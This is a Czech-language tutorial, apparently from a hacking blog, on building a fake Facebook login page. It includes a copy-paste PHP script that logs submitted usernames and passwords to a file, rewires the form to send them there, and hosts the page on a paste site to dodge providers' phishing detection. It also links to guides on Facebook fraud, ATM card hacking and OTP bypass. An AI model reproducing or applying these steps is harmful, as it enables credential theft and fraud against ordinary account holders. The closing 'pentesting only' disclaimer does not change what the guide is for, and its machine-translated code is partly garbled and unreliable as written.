obsah
jak vytvořit Facebook phishing link
Nedávno jsem narazil na mnoho průvodců o vytváření phishingových stránek. Přestože zásady každého průvodce jsou podobné, většina hostingových řešení uvedených v průvodci již nefunguje kvůli nárůstu zásahů phishingových stránek hostingovými společnostmi. V této příručce, projdu každým krokem nezbytným k vytvoření a hostování phishingové stránky podle vašeho výběru. Užijte si to!
Stáhněte si index HTML cílové webové stránky
Chcete-li začít, musíte získat index HTML stránky. Existují různé způsoby, jak toho dosáhnout, existují dokonce i šablony online pro populární weby. V tomto tutoriálu budu používat nejzákladnější způsob, abych byl co nejpříjemnější.
Čtěte také: jak vytvořit phishingový web pomocí Kali linux
přejděte na svou webovou stránku
v tomto tutoriálu se chystám na Phish Facebook.
Zobrazit zdroj webové stránky.
v závislosti na Vašem prohlížeči mohou existovat různé metody. Obvykle se to provádí kliknutím pravým tlačítkem myši na web a kliknutím na „Zobrazit zdroj“. Udělal jsem to v prohlížeči a okna by měla vypadat podobně:
na poli vpravo je zdroj webových stránek. Což vede k dalšímu kroku:
stažení a uložení zdrojového kódu
Vyberte pole a zkopírujte a vložte vše do pole do dokumentu txt. Použijte Poznámkový blok v systému windows a jednoduchý program pro úpravu textu, pokud nepoužíváte systém windows. (Nepoužívejte programy jako Word nebo stránky, protože je to opravdu pomalé). Poté, co jste to udělali, klikněte na „Uložit jako“ nebo na jakoukoli možnost, která vám umožní tento dokument uložit. V Poznámkovém bloku by to mělo vypadat takto:
změňte „Uložit jako typ“ na všechny soubory a změňte kódování na Unicode.
poté pojmenujte dokument “ index.html“, Samozřejmě bez řečových značek.
gratuluji! Dokončili jste první krok tutoriálu!
Čtěte také: Jak to udělat Facebook podvod, aniž by byl zakázán nebo se zablokoval
Lekce 2
vytvoření souboru PHP pro sklizeň hesla
soubor PHP je v podstatě nástroj, který v tomto scénáři sklízí uživatelské heslo. Existuje několik způsobů, jak můžete vytvořit tento PHP, pokud máte nějaké znalosti programování, ale pokud ne, stačí zkopírovat můj příklad PHP.
<?php
hlavička (‚umístění: facebook.com‘);
$handle = fopen („log.txt“, „a“);
foreach ($_POST as $ variable => $value) {
fwrite ($handle, $ variable);
fwrite ($handle, „=“);
fwrite ($handle, $value);
fwrite ($handle, „\r\n“);
}
fwrite ($handle, „\r\n\n\n \ n“);
fclose ($handle);
exit;
?>
stejně jako výše, uložte soubor PHP jako „všechny soubory“ a jako “ post.Linux“. Změňte kódování na Unicode a měli byste být připraveni jít!
upravte soubor HTML stránky tak, aby do něj zahrnoval soubor PHP.
nyní musíme začlenit náš soubor PHP, abychom mohli přijímat hesla, která uživatelé odesílají.
Najděte metodu odesílání hesel
nejprve musíte vidět, jak se webové stránky zabývají, když uživatel odešle uživatelské jméno-heslo.
pro Facebook stačí pouze Ctrl-F A do pole zadejte „=action“.
nyní musíte vše v podtržené části nahradit „post.php“, udržujte značky řeči. (jen jednu sadu prosím).
je zřejmé, že tato metoda se bude lišit pro jiné webové stránky. Dobrou metodou, jak ji najít, je použití nástroje Inspect Elements ve většině moderních prohlížečů a kliknutí na tlačítko Přihlášení. Najděte něco podobného výše uvedené metodě.
Přečtěte si také: Naučte se, jak hackovat karty ATM, stroje používající software Wizcardo
Vezměte prosím na vědomí: budete to muset změnit později, když skutečně hostíte web.
hostování PHP souboru pro ukládání hesel
nyní je zde šťavnatá část, díky níž je váš falešný web online, aby jej mohli procházet ostatní lidé.
k hostování a ukládání hesel můžete použít libovolné hostingové služby zdarma. Hostingový plán však musí obsahovat něco, co se nazývá „FTP“. Pro tento tutoriál budu používat 000webhost.
přejděte na FTP Server pro vaši webhostingovou službu
v tomto kroku předpokládám, že jste již vytvořili web s vaší hostingovou službou.
pro 000webhost stačí kliknout na „správce souborů“ a kliknout na „Nahrát soubory“. Zde je obrázek FTP serveru pro 000webhost:
ignorujte ostatní soubory, to jsou jen některé z mých osobních věcí, které nesouvisejí s tímto tutoriálem.
Nahrajte své PHP soubory a změňte oprávnění
jak vidíte, již jsem nahrál svůj PHP soubor. Stačí ji však nahrát do hlavní složky FTP serveru. (Některé FTP server neumožňuje nahrát do kořenové složky, stačí sledovat jejich konkrétní pokyny).
nyní musíte změnit oprávnění na „777“, což je v podstatě každé povolení. Po zobrazení výzvy k zaškrtnutí políček pro oprávnění stačí zaškrtnout všechny.
nyní můžete zavřít FTP server. Poznamenejte si svou webovou adresu!
Přečtěte si také: krokové pokyny Chcete-li obejít ověření OTP na jakýchkoli webových stránkách
hostování skutečné phishingové stránky
pro tento krok budete muset použít přesného poskytovatele hostingu, který používám, jinak budete zakázáni.
existuje důvod, proč nepoužívám stejného poskytovatele hostingu pro svou skutečnou stránku, a to proto, že většina poskytovatelů hostingu použije nějaký druh skenování k detekci phishingových stránek. V minulosti jsem vyzkoušel více hostingových služeb a všechny mi zakázaly 30 minut od nahrání indexového souboru.
konfigurace příspěvku.php Forum
nyní, než hostíte web, nezapomeňte na příspěvek.php / přihlašovací formulář věc, kterou jsme nakonfigurovali výše?
musíte znovu najít přihlašovací formulář ve svém indexu.html a nahradit “ post.php “ s “ http://yourwebsiteforyourpostphpupload/post.php“, za předpokladu, že jste nahráli do kořenové složky. Nezapomeňte přidat http: / / před web. Chcete-li to otestovat, přejděte na web (http://yourwebsiteforyourpostphpupload/post.php) a zjistěte, zda vás přesměruje na Facebook.s, pokud ano, vložili jste správný web. Pokud tomu tak není, zkontrolujte, zda jste soubor nahráli do správného adresáře.
Hosting aktuální stránky
přejít na htmlpasta.com. uvidíte něco podobného:
poté musíte index zkopírovat.html soubor pro váš phishingový web a vložte jej sem.
Nyní klikněte na tlačítko re a klepněte na tlačítko Vložit, dostanete odkaz na vaše webové stránky.
Závěr
Gratulujeme! Dokončili jste hostování svého prvního phishingového webu! Přejděte na svůj web a pokuste se zadat nějaké falešné přihlašovací údaje, po kliknutí na tlačítko Přihlášení by vás mělo přesměrovat na facebook.com. přihlaste se na FTP server, který hostil váš příspěvek.php soubor, a měl by existovat nový dokument s názvem log.txt, který je uložen ve stejné složce jako váš příspěvek.php soubor. Tam by měly být uloženy všechny přihlašovací údaje.
Čtěte také: 2020 yahoo yahoo format, billing format, pdf download
nepoužívejte to pro škodlivé účely, používejte pouze pro penetrační testování a se souhlasem vaší oběti.
